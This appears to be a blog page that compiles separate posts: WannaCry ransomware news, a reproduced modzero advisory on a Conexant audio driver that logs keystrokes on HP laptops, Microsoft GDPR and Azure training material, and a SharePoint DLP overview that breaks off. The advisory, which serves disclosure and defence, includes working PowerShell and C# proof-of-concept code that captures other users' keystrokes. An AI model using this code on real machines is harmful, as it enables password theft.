Stop WannaCry Ransomware from infecting.

wannacry-2-ransomware-attack

If you are following the news, by now you might be aware that a security researcher has activated a “Kill Switch” which apparently stopped the WannaCry ransomware from spreading further.

But it’s not true, neither the threat is over yet.

However, the kill switch has just slowed down the infection rate.

Updated: Multiple security researchers have claimed that there are more samples of WannaCry out there, with different ‘kill-switch’ domains and without any kill-switch function, continuing to infect unpatched computers worldwide (find more details here).

So far, over 237,000 computers across 99 countries around the world have been infected, and the infection is still rising even hours after the kill switch was triggered by the 22-years-old British security researcher behind the twitter handle ‘MalwareTech.’

For those unaware, WannaCry is an insanely fast-spreading ransomware malware that leverages a Windows SMB exploit to remotely target a computer running on unpatched or unsupported versions of Windows.

Once infected, WannaCry also scans for other vulnerable computers connected to the same network, as well scans random hosts on the wider Internet, to spread quickly.

The SMB exploit, currently being used by WannaCry, has been identified as EternalBlue, a collection of hacking tools allegedly created by the NSA and then subsequently dumped by a hacking group calling itself “The Shadow Brokers” over a month ago.

“If NSA had privately disclosed the flaw used to attack hospitals when they *found* it, not when they lost it, this may not have happened,” NSA whistleblower Edward Snowden says.

Kill-Switch for WannaCry? No, It’s not over yet!

wannacry-ransomware-kill-switch

In our previous two articles, we have put together more information about this massive ransomware campaign, explaining how MalwareTech accidentally halted the global spread of WannaCry by registering a domain name hidden in the malware.

hxxp://www[.]iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com

The above-mentioned domain is responsible for keeping WannaCry propagating and spreading like a worm, as I previously explained that if the connection to this domain fails, the SMB worm proceeds to infect the system.

Fortunately, MalwareTech registered this domain in question and created a sinkhole – tactic researchers use to redirect traffic from the infected machines to a self-controlled system. (read his latest blog post for more details)

Updated: Matthieu Suiche, a security researcher, has confirmed that he has found a new WannaCry variant with a different domain for kill-switch function, which he registered to redirect it to a sinkhole in an effort to slows down the infections.

hxxp://ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com/

The newly discovered WannaCry variant works exactly like the previous variant that wreaked havoc across the world Friday night.

But, if you are thinking that activating the kill switch has completely stopped the infection, then you are mistaken.

Since the kill-switch feature was in the SMB worm, not in the ransomware module itself., “WannaCrypt ransomware was spread normally long before this and will be long after, what we stopped was the SMB worm variant,” MalwareTech told The Hacker News.

You should know that the kill-switch would not prevent your unpatched PC from getting infected, in the following scenarios:

  • If you receive WannaCry via an email, a malicious torrent, or other vectors (instead of SMB protocol).
  • If by chance your ISP or antivirus or firewall blocks access to the sinkhole domain.
  • If the targeted system requires a proxy to access the Internet, which is a common practice in the majority of corporate networks.
  • If someone makes the sinkhole domain inaccessible for all, such as by using a large-scale DDoS attack.

MalwareTech also confirmed THN that some “Mirai botnet skids tried to DDoS the [sinkhole] server for lulz,” in order to make it unavailable for WannaCry SMB exploit, which triggers infection if the connection fails. But “it failed hardcore,” at least for now.

WannaCry 2.0, Ransomware With *NO* Kill-Switch Is On Hunt!

wannacry-2-ransomware-attack

Initially, this part of story was based on research of a security researcher, who earlier claimed to have the samples of new WannaCry ransomware that comes with no kill-switch function. But for some reason, he backed off. So, we have removed his references from this story for now.

However, shortly after that, we were confirmed by Costin Raiu, the director of global research and analysis team at Kaspersky Labs, that his team had seen more WannaCry samples on Friday that did not have the kill switch.

“I can confirm we’ve had versions without the kill switch domain connect since yesterday,” told The Hacker News.

Updated: WannaCry 2.0 is Someone Else’s Work


Raiu from Kaspersky shared some samples, his team discovered, with Suiche, who analysed them and just confirmed that there is a WannaCrypt variant without kill switch, and equipped with SMB exploit that would help it to spread rapidly without disruption.

What’s even worse is that the new WannaCry variant without a kill-switch believed to be created by someone else, and not the hackers behind the initial WannaCry ransomware.

“The patched version matt described does attempt to spread. It’s a full set which was modified by someone with a hex editor to disable the kill switch,” Raiu told me.

Updated: However, Suiche also confirmed that the modified variant with no kill switch is corrupted, but this doesn’t mean that other hackers and criminals would not come up with a working one.

“Given the high profile of the original attack, it’s going to be no surprise at all to see copycat attacks from others, and perhaps other attempts to infect even more computers from the original WannaCry gang. The message is simple: Patch your computers, harden your defences, run a decent anti-virus, and – for goodness sake – ensure that you have secure backups.” Cyber security expert Graham Cluley told The Hacker News.

Expect a new wave of ransomware attack, by initial attackers and new ones, which would be difficult to stop, until and unless all vulnerable systems get patched.

“The next attacks are inevitable, you can simply patch the existing samples with a hex editor and it’ll continue to spread,” Matthew Hickey, a security expert and co-founder of Hacker House told me.

“We will see a number of variants of this attack over the coming weeks and months so it’s important to patch hosts. The worm can be modified to spread other payloads not just WCry and we may see other malware campaigns piggybacking off this samples success.”

Even after WannaCry attacks made headlines all over the Internet and Media, there are still hundreds of thousands of unpatched systems out there that are open to the Internet and vulnerable to hacking.

“The worm functionality attempts to infect unpatched Windows machines in the local network. At the same time, it also executes massive scanning on Internet IP addresses to find and infect other vulnerable computers. This activity results in large SMB traffic from the infected host,” Microsoft says.

Believe me, the new strain of WannaCry 2.0 malware would not take enough time to take over another hundred of thousand vulnerable systems.

Apply the Windows Security patch and stop this ransomware from infecting you or your organization by applying these patch

https://www.catalog.update.microsoft.com/Search.aspx?q=kb4012598 Download the update for your system and apply it and if require please diactivate SMB/ICF file sharing feature from your windows systems.

Several HP laptops has keylogger in audio driver.

—————————————————————- v3 –
modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]
———————————————————————

———————————————————————
1. Timeline
———————————————————————

* 2017-04-28: Vulnerability has been discovered in MicTray64 version
1.0.0.31 / Thu Dec 24 08:35:35 2015
* 2017-04-28: Vendor Conexant contacted (Email)
* 2017-04-29: Higher impact has been discovered in most recent
MicTray64 version 1.0.0.46 / Tue Oct 11 10:56:13 2016
* 2017-04-30: CVE-2017-8360 has been assigned to this vulnerability.
* 2017-05-01: Contacted Hewlett-Packard Enterprise security advisor
with detailed description of the problem.
* 2017-05-02: Contacted vendor Conexant via Twitter
* 2017-05-05: Sent technical information to HPE security contact.
Informed HPE about releasing the advisory on Monday 8th
of May in case we don’t get any feedback on our report.
* 2017-05-05: Received some notes from HPE after sending technical
information. They tried to reach for security folks
at HP Inc. to gain attention.
* 2017-05-11: Release of the advisory

———————————————————————
2. Summary
———————————————————————

Vendor: Conexant Systems, Inc.

Software packages known to be affected:

* Recent and previous (Q2/2017) HP Audiodriver Packages /
Conexant High-Definition (HD) Audio Driver
Version 10.0.931.89 REV: Q PASS: 5
(ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.html)
* Probably other hardware vendors, shipping Conexant hardware and
drivers

Systems known to be affected:

According to HP information in sp79420.html, the following systems
are affected:

* HARDWARE PRODUCT MODEL(S):
HP EliteBook 820 G3 Notebook PC
HP EliteBook 828 G3 Notebook PC
HP EliteBook 840 G3 Notebook PC
HP EliteBook 848 G3 Notebook PC
HP EliteBook 850 G3 Notebook PC
HP ProBook 640 G2 Notebook PC
HP ProBook 650 G2 Notebook PC
HP ProBook 645 G2 Notebook PC
HP ProBook 655 G2 Notebook PC
HP ProBook 450 G3 Notebook PC
HP ProBook 430 G3 Notebook PC
HP ProBook 440 G3 Notebook PC
HP ProBook 446 G3 Notebook PC
HP ProBook 470 G3 Notebook PC
HP ProBook 455 G3 Notebook PC
HP EliteBook 725 G3 Notebook PC
HP EliteBook 745 G3 Notebook PC
HP EliteBook 755 G3 Notebook PC
HP EliteBook 1030 G1 Notebook PC
HP ZBook 15u G3 Mobile Workstation
HP Elite x2 1012 G1 Tablet
HP Elite x2 1012 G1 with Travel Keyboard
HP Elite x2 1012 G1 Advanced Keyboard
HP EliteBook Folio 1040 G3 Notebook PC
HP ZBook 17 G3 Mobile Workstation
HP ZBook 15 G3 Mobile Workstation
HP ZBook Studio G3 Mobile Workstation
HP EliteBook Folio G1 Notebook PC
* OPERATING SYSTEM(S):
Microsoft Windows 10 32
Microsoft Windows 10 64
Microsoft Windows 10 IOT Enterprise 32-Bit (x86)
Microsoft Windows 10 IOT Enterprise 64-Bit (x86)
Microsoft Windows 7 Enterprise 32 Edition
Microsoft Windows 7 Enterprise 64 Edition
Microsoft Windows 7 Home Basic 32 Edition
Microsoft Windows 7 Home Basic 64 Edition
Microsoft Windows 7 Home Premium 32 Edition
Microsoft Windows 7 Home Premium 64 Edition
Microsoft Windows 7 Professional 32 Edition
Microsoft Windows 7 Professional 64 Edition
Microsoft Windows 7 Starter 32 Edition
Microsoft Windows 7 Ultimate 32 Edition
Microsoft Windows 7 Ultimate 64 Edition
Microsoft Windows Embedded Standard 7 32
Microsoft Windows Embedded Standard 7E 32-Bit

CVE-ID: CVE-2017-8360
Severity: High/Medium
Type: Covert Storage Channel
Vendor: Conexant Systems, Inc.
Product: mic tray icon
Version: =< 1.0.0.46
Attack type: Local
Affected Components: Scheduled Task c:\windows\system32\mictray64.exe

———————————————————————
3. Details
———————————————————————

Conexant’s MicTray64.exe is installed with the Conexant audio driver
package and registered as a Microsoft Scheduled Task to run after each
user login. The program monitors all keystrokes made by the user to
capture and react to functions such as microphone mute/unmute
keys/hotkeys. Monitoring of keystrokes is added by implementing a low-
level keyboard input hook [1] function that is installed by calling
SetwindowsHookEx().

In addition to the handling of hotkey/function key strokes, all key-
scancode information [2] is written into a logfile in a world-readable
path (C:\Users\Public\MicTray.log). If the logfile does not exist or
the setting is not yet available in Windows registry, all keystrokes
are passed to the OutputDebugString API, which enables any process in
the current user-context to capture keystrokes without exposing
malicious behavior. Any framework and process with access to the
MapViewOfFile API should be able to silently capture sensitive data by
capturing the user’s keystrokes. In version 10.0.0.31, only
OutputDebugString was used to forward key scancodes and nothing was
written to files. The following pseudocode shows the registration of
the keylogging function handler of MicTray64.exe version 1.0.0.46:

int64 keylogger_enable(bool activate)
{
[…]
if ( !keylogger_active )
{
[…]
// 13=WH_KEYBOARD_LL: Installs a hook procedure that
// monitors low-level keyboard input events. For
// more information, see the LowLevelKeyboardProc
// hook procedure.
hKeyloggerHook = SetWindowsHookExW(
13, (HOOKPROC)handle_scancode,
hSelf,
0);

if ( hKeyloggerHook )
{
keylogger_active = 1;
return 0;
}
[…]
}

After registering function handle_scancode() as a handler to
any keystroke made by the user, the following pseudo-code is executed
every time a key is pressed or released:

LRESULT handle_scancode(
int _in_nCode,
WPARAM _in_wParam,
tagKBDLLHOOKSTRUCT *_in_lParam_keystroke)
{
tagKBDLLHOOKSTRUCT *key_stroke;
WPARAM wParam;
int nCode;
int64 target;
DWORD is_keyfoo;
int is_keydown;
char tmp;
int64 key_flags;
int64 key_vk;

key_stroke = _in_lParam_keystroke;
wParam = _in_wParam;
nCode = _in_nCode;

if ( _in_nCode >= 0 )
{
target = (cfg_HotKeyMicScancode >> 8 *
(cfg_HotKeyMicScancode_len – cfg_HotKeyMicScancode_len2));
LODWORD(key_vk) = _in_lParam_keystroke->vkCode;
LODWORD(key_flags) = _in_lParam_keystroke->flags;
is_keyfoo = _in_lParam_keystroke->flags & 1;
is_keydown = ~(key_flags >> 7) & 1;

[*] send_to_dbglog(
0x1D,
L”Mic target 0x%x scancode 0x%x flags 0x%x extra 0x%x vk 0x%x\n”,
target,
_in_lParam_keystroke->scanCode,
key_flags,
_in_lParam_keystroke->dwExtraInfo,
key_vk);

conexant_handle_fn_keys(
cfg_MicMuteScancodeSettings,
is_keydown,
key_stroke->scanCode,
target,
&cfg_HotKeyMicScancode_len,
&cfg_HotKeyMicScancode_len2,
1);

if ( cfg_MicMuteScancodeSettings & 4 )
conexant_handle_fn_keys(
cfg_MicMuteScancodeSettings,
is_keydown,
key_stroke->scanCode,
(cfg_HotKeyMicScancode2 >> 8 *
(cfg_HotKeyMicScancode2_len – cfg_HotKeyMicScancode2_len2)),
&cfg_HotKeyMicScancode2_len,
&cfg_HotKeyMicScancode2_len2,
1);

tmp = cfg_SpkMuteScancodeSettings;

if ( cfg_SpkMuteScancodeSettings & 8 && is_keyfoo
|| !(cfg_SpkMuteScancodeSettings & 8) )
{
conexant_handle_fn_keys(
cfg_SpkMuteScancodeSettings,
is_keydown,
key_stroke->scanCode,
(cfg_HotKeySpkScancode >> 8 *
(cfg_HotKeySpkScancode_len – cfg_HotKeySpkScancode_len2)),
&dword_1402709C8,
&dword_1402709CC,
0);
tmp = cfg_SpkMuteScancodeSettings;
}

if ( tmp & 4 && (tmp & 8 && is_keyfoo || !(tmp & 8)) )
conexant_handle_fn_keys(
tmp,
is_keydown,
key_stroke->scanCode,
(cfg_HotKeySpkScancode2 >> 8 *
(cfg_HotKeySpkScancode2_len – cfg_HotKeySpkScancode2_len2)),
&cfg_HotKeySpkScancode2_len,
&cfg_HotKeySpkScancode2_len2,
0);
}
return CallNextHookEx(hhk, nCode, wParam, key_stroke);
}

The function called at [*] writes every keystroke to a file or
broadcast it via Microsofts Debug Monitor APIs via store_keystroke():

void store_keystroke(LPCVOID lpBuffer)
{
WORD *scancode_logline;
int64 str_len;
DWORD NumberOfBytesWritten;
int str_newline;
scancode_logline = lpBuffer;
if ( g_write_to_logfile )
{
SetFilePointer(g_hFile, 0, 0, 2);
str_len = -1;

while ( scancode_logline[str_len++ + 1] != 0 )
;

WriteFile(
g_hFile,
scancode_logline,
2 * str_len,
&NumberOfBytesWritten,
0);

str_newline = ‘\n\0\r’;
WriteFile(g_hFile, &str_newline, 4, &NumberOfBytesWritten, 0);
}
else
{
OutputDebugStringW(lpBuffer);
}
}

This issue leads to a high risk of leaking sensitive user input to any
person or process that is able to read files in
C:\Users\Public\MicTray.log or call MapViewOfFile(). Investigators
with access to the unencrypted file-system might be able to recover
sensitive data of historic key-logs as well. Users are not aware that
every keystroke made while entering sensitive information – such as
passphrases, passwords on local or remote systems – are captured by
Conexant and exposed to any process and framework with access to the
file-system or MapViewOfFile API.
Additionally, this information-leak via Covert Storage Channel
enables malware authors to capture keystrokes without taking the risk
of being classified as malicious task by AV heuristics.

It is not recommended to provide information on keystrokes to
arbitrary processes by writing keystrokes to disk or by using
OutputDebugStringW() for debugging purposes.

———————————————————————
4. Impact
———————————————————————

Any process that is running in the current user-session and therefore
able to monitor debug messages, can capture keystrokes made by the
user. Processes are thus able to record sensitive data such as
passwords, without performing suspicious activities that may trigger
AV vendor heuristics. Furthermore, any process running on the system
by any user is able to access all keystrokes made by the user via
file-system access. It is not known, if log-data is submitted to
Conexant at any time or why all key presses are logged anyway.

———————————————————————
5. Proof of concept exploit
———————————————————————

A proof-of-concept can be implemented by using PowerShell to
parse MicTray.log:

$filename = “c:\users\public\MicTray.log”

[System.IO.FileStream] $fs = [System.IO.File]::Open(
$filename,
[System.IO.FileMode]::Open,
[System.IO.FileAccess]::Read,
[System.IO.FileShare]::ReadWrite)

[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(
$fs,
[Text.UTF8Encoding]::UNICODE)

$el = 0

while($el -lt 2) {

$line = $fr.ReadLine()

# handle broken newlines in log…
if([string]::IsNullOrEmpty($line)) {
$el++
} else {
$el=0
}

$mc = [regex]::Match($line,
“MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$”)
$r = $mc.Groups[2].Value

if(-Not [string]::IsNullOrEmpty($r)) {
$i = [convert]::ToInt32($r, 16)
$c = [convert]::ToChar($i)

if($i -lt 0x20 -or $i -gt 0x7E) { $c = ‘.’ }

write-host -NoNewLine $(“{0}” -f $c)
}
}

However, if no logfile is written, it is also possible to obtain
keystrokes by just following Microsoft’s DbMon Debug Monitor [3]
approach of capturing strings passed to OutputDebugString [4]:

namespace mod0_dbgview
{
class Program
{
public static void Main(string[] args)
{
DebugMonitor.Start();
DebugMonitor.OnOutputDebugString += new
OnOutputDebugStringHandler(OnOutputDebugString);
Console.WriteLine(“Press ‘Enter’ to exit.”);
Console.ReadLine();
DebugMonitor.Stop();
}
// version 1.0.0.46
private static void OnOutputDebugString(int pid, string text)
{
char sep = ‘ ‘;
char nl = ‘\n’;
text = text.TrimEnd(nl);
string[] items = text.Split(sep);
if (items[7].Equals(“Mic”))
{
int c_int = Convert.ToInt32(items[17], 16);
if (c_int == 0xd)
{
Console.WriteLine();
}
else if (Convert.ToInt32(items[13], 16) == 0x00)
Console.Write(“{0}”, (char)(c_int & 0xff));
}
}

// version 1.0.0.31
private static void OnOutputDebugString_v31(
int pid,
string text)
{
char sep = ‘ ‘;
string[] items = text.Split(sep);
if (items[0].Equals(“Mic”))
{
int c_int = Convert.ToInt32(items[10], 16);
if (c_int == 0xd)
{
Console.WriteLine();
}
else if(Convert.ToInt32(items[6], 16) == 0x00)
Console.Write(“{0}”, (char)(c_int & 0xff));
}
}
}
}

Any framework that provides an API down to ReadFile() or Microsoft’s
MapViewOfFile() should be able to capture keystrokes captured by
Conexant’s audio driver utils. By using Microsoft Windows Sysinternals
Dbgview [5], keystrokes can be visualized easily, if they are not
written to file.

———————————————————————
6. Workaround
———————————————————————

Delete MicTray executables and logfiles. Deleting the Scheduled
Task is not sufficient, as Conexant’s Windows Service CxMonSvc will
launch MicTray otherwise. The executable is located at
c:\Windows\System32\MicTray64.exe, the MicTray logfile is located at
C:\Users\Public\MicTray.log

———————————————————————
7. Fix
———————————————————————

It is not known to modzero, if a security fix is available.

———————————————————————
8. References
———————————————————————

[1] “LowLevelKeyboardProc callback function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644985(v=vs.85).aspx
[2] KBDLLHOOKSTRUCT structure –
https://msdn.microsoft.com/en-us/library/windows/desktop/ms644967(v=vs.85).aspx
[3] “DbMon: Implements a Debug Monitor” –
https://msdn.microsoft.com/en-us/library/aa242171(v=vs.60).aspx
[4] “MSDN/OutputDebugString function” –
https://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
[5] “Microsoft Windows Sysinternals DebugView”
https://technet.microsoft.com/en-us/sysinternals/debugview.aspx
[6] “modzero Security Advisory: Unintended/Covert Storage Channel for
sensitive data in Conexant HD Audio Driver Package. [MZ-17-01]” –
https://www.modzero.ch/advisories/MZ-17-01-Conexant-Keylogger.txt

SHA256 sums:
127163c863b320814b6f420390db9d5ce48e9158bdb62aa94e953d85ec1e7a89 *MicTray64_v31.exe
7245f89fa00ea5fe5b290758a99288188d58cdaf2f4192ce469a5f4d256eaae0 *MicTray64_v31.i64 (IDA Pro DB by April 29, 2017)
ba1bc46ae6a4a6ecca08028022163e6bba291c330b057c6235c33a7519e617b7 *MicTray64_v31.xml
c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8 *MicTray64_v46.exe
4563a0e4e85edeb7ddeba57d1cb8e4a30f1b5ee9fb128725a2664de2aa8c17ec *MicTray64_v46.i64 (IDA Pro DB by April 29, 2017)
ba1bc46ae6a4a6ecca08028022163e6bba291c330b057c6235c33a7519e617b7 *MicTray64_v46.xml

———————————————————————
9. Credits
———————————————————————

* Thorsten Schroeder

———————————————————————
10. About modzero
———————————————————————

The independent Swiss company modzero AG assists clients with
security analysis in the complex areas of computer technology. The
focus lies on highly detailed technical analysis of concepts,
software and hardware components as well as the development of
individual solutions. Colleagues at modzero AG work exclusively in
practical, highly technical computer-security areas and can draw on
decades of experience in various platforms, system concepts, and
designs.

https://www.modzero.ch
contact@modzero.ch

The General Data Protection Regulation (GDPR) for Office 365

In May 2018, a European privacy law is due to take effect that will require big changes, and potentially significant investments, by organizations all over the world—including Microsoft and our customers.

Known as the General Data Protection Regulation (GDPR), the law imposes new rules on companies, government agencies, non-profits, and other organizations that offer goods and services to people in the European Union (EU), or that collect and analyze data tied to EU residents. The GDPR applies no matter where you are located.

Microsoft believes the GDPR represents an important step forward for individual privacy rights. It gives EU residents more control over their “personal data” (which is precisely defined by the GDPR). The GDPR also seeks to ensure personal data is protected no matter where it is sent, processed, or stored. The law updates European privacy regulations for the first time in more than two decades, bringing them more in line with current technologies, and increases the uniformity of privacy regulations across the EU’s member states.

The GDPR is also a complex regulation that may require vast changes in how you gather and manage data. Microsoft has a long history of helping our customers comply with complex regulations. When it comes to preparing for the GDPR, we’ve got your back.

Supporting your journey to compliance with the GDPR

We want to help you focus on your core business while efficiently preparing for the GDPR. Our goal is to streamline your compliance with the GDPR through smart technology, innovation, and collaboration.

Microsoft products and services are available today to help you meet the GDPR requirements, and we are investing in additional features and functionality. Through our cloud services and on-premises solutions we’ll help you locate and catalog the personal data in your systems, build a more secure environment, simplify your management and monitoring of personal data, and give you the tools and resources you need to meet the GDPR reporting and assessment requirements.

We will share what we learn on our journey to compliance to make yours easier. We will show you how our existing enterprise products and services—such as Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server and Azure SQL Database, and Windows 10—can jumpstart that journey today.

Where do I start?

The GDPR contains many requirements about how you collect, store and use personal information. This means not only how you identify and secure the personal data in your systems, but also how you accommodate new transparency requirements, how you detect and report personal data breaches, and how you train privacy personnel and employees.

Given how much is involved, you should not wait until the regulation takes effect in May 2018 to prepare. You need to begin reviewing your privacy and data management practices now. Failure to comply with the GDPR could prove costly, as companies that do not meet the requirements and obligations could face substantial fines and reputational harm.

We recommend you begin your journey to compliance with the GDPR by focusing on four key steps:

(1) Discover: Identify what personal data you have and where it resides. (2) Manage: Govern how personal data is used and accessed. (3) Protect: Establish security controls to prevent, detect, and respond to vulnerabilities and data breaches. (4) Report: Keep required documentation, and continuously review and update your data protection policies and practices.

Microsoft products and services provide powerful solutions to tackle these steps in your journey to compliance with the GDPR.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, Office 365, SQL Server/Azure SQL Database, and Windows 10.

Microsoft’s commitment to the GDPR

The goals of the GDPR are consistent with Microsoft’s long-standing commitment to security, privacy, and transparency.

We are working to bring our products and services into compliance with the GDPR by May 2018. We are updating the features and functionality in all of our services to meet the GDPR requirements, and we are updating our documentation and our customer agreements to reflect the GDPR requirements.

Microsoft offers the most comprehensive set of compliance capabilities of any cloud service provider. And, we lead the industry in engaging with customers, regulatory bodies, and standards boards to advance compliance and serve customers’ needs. We will remain closely engaged with you as we prepare together for the GDPR to go into effect.

Microsoft designed Office and Office 365 with industry-leading security measures and privacy policies to safeguard your data in the cloud, including the categories of personal data identified by the GDPR. Office and Office 365 can help you on your journey to reducing risks and achieving compliance with the GDPR.

One essential step to meeting the GDPR obligations is discovering and controlling what personal data you hold and where it resides. There are a number of Office 365 solutions that can help you identify or manage access to personal data:

  • Data Loss Prevention (DLP) in Office and Office 365 can identify over 80 common sensitive data types including financial, medical, and personally identifiable information. In addition, DLP allows organizations to configure actions to be taken upon identification to protect sensitive information and prevent its accidental disclosure.
  • Advanced Data Governance uses intelligence and machine-assisted insights to help you find, classify, set policies on, and take action to manage the lifecycle of the data that is most important to your organization.
  • Office 365 eDiscovery search can be used to find text and metadata in content across your Office 365 assets—SharePoint Online, OneDrive for Business, Skype for Business Online, and Exchange Online. In addition, powered by machine learning technologies, Office 365 Advanced eDiscovery can help you identify documents that are relevant to a particular subject (for example, a compliance investigation) quickly and with better precision than traditional keyword searches or manual reviews of vast quantities of documents.
  • Customer Lockbox for Office 365 can help you meet compliance obligations for explicit data access authorization during service operations. When a Microsoft service engineer needs access to your data, access control is extended to you so that you can grant final approval for access. Actions taken are logged and accessible to you so that they can be audited.

Another core requirement of the GDPR is protecting personal data against security threats. Current Office 365 features that safeguard data and identify when a data breach occurs include:

  • Advanced Threat Protection in Exchange Online Protection helps protect your email against new, sophisticated malware attacks in real time. It also allows you to create policies that help prevent your users from accessing malicious attachments or malicious websites linked through email.
  • Threat Intelligence helps you proactively uncover and protect against advanced threats in Office 365. Deep insights into threats—provided by Microsoft’s global presence, the Intelligent Security Graph, and input from cyber threat hunters—help you quickly and effectively enable alerts, dynamic policies, and security solutions.
  • Advanced Security Management enables you to identify high-risk and abnormal usage, alerting you to potential breaches. In addition, it allows you to set up activity policies to track and respond to high risk actions.
  • Finally, Office 365 audit logs allow you to monitor and track user and administrator activities across workloads in Office 365, which help with early detection and investigation of security and compliance issues.

For more information please visit our Office 365 Trust Center.

To learn more about how Microsoft products and services can help you prepare to comply with the GDPR, please see the sections on Azure, Dynamics 365, Enterprise Mobility + Security, SQL Server/Azure SQL Database, and Windows 10.

For more detail visit the Microsoft Trust Center.

Cloud with Azure 101

Hi,

In this article I would like to share the learning options and how can you get Microsoft Azure cloud training.

Office 365 IT Pro Training https://mva.microsoft.com/en-US/training-courses/support-corner-accessing-azure-ad-portal-from-office-365-10634

Option 1: Microsoft Azure Free Training

Free Training: https://azure.microsoft.com/en-in/community/training/

Azure VMs Getting Started: https://azure.microsoft.com/en-us/community/training/courses/azure-vms-getting-started/

Azure Infrastructure Getting Started: https://azure.microsoft.com/en-us/community/training/courses/managing-infrastructure-microsoft-azure-getting-started/

Managing and Monitoring: https://www.pluralsight.com/courses/azure-iaas-monitoring-management-getting-started?twoid=54b2915b-fe06-488f-9d5d-c8a892d950eb

Microsoft Virtual Academy a free learning platform

Azure Fundamentals: https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-8391

Azure AD: https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-azure-active-directory-16754

https://mva.microsoft.com/en-US/training-courses/azure-active-directory-core-skills-jump-start-8736

Azure Security Center: https://mva.microsoft.com/en-US/training-courses/introduction-to-azure-security-center-16614

https://mva.microsoft.com/en-US/training-courses/automating-the-cloud-with-azure-automation-8323

https://mva.microsoft.com/en-US/training-courses/deploying-linux-vms-on-microsoft-azure-8451

https://mva.microsoft.com/en-US/training-courses/azure-networking-fundamentals-for-it-pros-8917

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-storage-17237

Azure Infrastructure

https://mva.microsoft.com/en-US/training-courses/moving-to-hybrid-cloud-with-microsoft-azure-8372

https://mva.microsoft.com/en-US/training-courses/certification-exam-overview-70533-implementing-microsoft-azure-infrastructure-solutions-17405

https://mva.microsoft.com/en-US/training-courses/certification-exam-overview-70532-developing-microsoft-azure-solutions-17404

https://mva.microsoft.com/en-US/training-courses/certification-exam-overview-70534-architecting-microsoft-azure-solutions-17406

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-virtual-networking-16753

https://mva.microsoft.com/en-US/training-courses/building-microservices-applications-on-azure-service-fabric-16747

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-iaas-deep-dive-jump-start-8287

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-machine-learning-jump-start-8425

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-virtual-machines-16752

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-paas-cloud-services-17332

https://mva.microsoft.com/en-US/training-courses/microsoft-azure-for-it-pros-content-series-management-security-17254

https://mva.microsoft.com/en-US/training-courses/getting-started-with-azure-security-for-the-it-professional-11165

 

DLP in SharePoint an Overview

To comply with business standards and industry regulations, organizations need to protect sensitive information and prevent its inadvertent disclosure. Examples of sensitive information that you might want to prevent from leaking outside your organization include financial data or personally identifiable information (PII) such as credit card numbers, social security numbers, or national ID numbers. With a data loss prevention (DLP) policy in SharePoint Server 2016, you can identify, monitor, and automatically protect sensitive information across your site collections.

With DLP, you can:

  • Create a DLP query to identify what sensitive information now exists in your site collections. Before you create DLP policies, it’s often helpful to see what types of sensitive information people in your organization are working with, and which site collections contain this sensitive information. With a DLP query, you can find sensitive information that’s subject to common industry regulations, better understand your risks, and determine what and where is the sensitive information that your DLP policies need to protect.
  • Create a DLP policy to monitor and automatically protect sensitive information in your site collections. For example, you can set up a policy that displays a policy tip to users if they save documents that contain personally identifiable information. Further, the policy can automatically block access to those documents for everyone but the site owner, content owner, and whoever last modified the document. And lastly, because you don’t want your DLP policies to prevent people from getting their work done, the policy tip has an option to override the blocking action, so that people can continue to work with documents if they have a business justification.

DLP templates

When you create a DLP query or a DLP policy, you can choose from a list of DLP templates that correspond to common regulatory requirements. Each DLP template identifies specific types of sensitive information – for example, the template named U.S. Personally Identifiable Information (PII) Data identifies content that contains U.S. and U.K. passport numbers, U.S. Individual Taxpayer Identification Numbers (ITIN), or U.S. Social Security Numbers (SSN).

DLP policy templates

Sensitive information types

A DLP policy helps protect sensitive information, which is defined as a sensitive information type. SharePoint Server 2016 includes definitions for many common sensitive information types that are ready for you to use, such as a credit card number, bank account numbers, national ID numbers, and passport numbers.

When a DLP policy looks for a sensitive information type such as a credit card number, it does not simply look for a 16-digit number. Each sensitive information type is defined and detected by using a combination of:

  • Keywords
  • Internal functions to validate checksums or composition
  • Evaluation of regular expressions to find pattern matches
  • Other content examination

This helps DLP detection achieve a high degree of accuracy while reducing the number of false positives that can interrupt peoples’ work.

Each DLP template looks for one or more types of sensitive information. For more information on how each sensitive information type works, see What the sensitive information types in SharePoint Server 2016 look for.

This DLP template… Looks for these sensitive information types…
U.S. Personally Identifiable Information (PII) Data U.S. / U.K. Passport Number

U.S. Individual Taxpayer Identification Number (ITIN)

U.S. Social Security Number (SSN)

U.S. Gramm-Leach-Bliley Act (GLBA) Credit Card Number

U.S. Bank Account Number

U.S. Individual Taxpayer Identification Number (ITIN)

U.S. Social Security Number (SSN)

PCI Data Security Standard (PCI DSS) Credit Card Number
U.K. Financial Data Credit Card Number

EU Debit Card Number

SWIFT Code

U.S. Financial Data ABA Routing Number

Credit Card Number

U.S. Bank Account Number

U.K. Personally Identifiable Information (PII) Data U.K. National Insurance Number (NINO)

U.S. / U.K. Passport Number

U.K. Data Protection Act SWIFT Code

U.K. National Insurance Number (NINO)

U.S. / U.K. Passport Number

U.K. Privacy and Electronic Communications Regulations SWIFT Code
U.S. State Social Security Number Confidentiality Laws U.S. Social Security Number (SSN)
U.S. State Breach Notification Laws Credit Card Number

U.S. Bank Account Number

U.S. Driver’s License Number

U.S. Social Security Number (SSN)

DLP queries

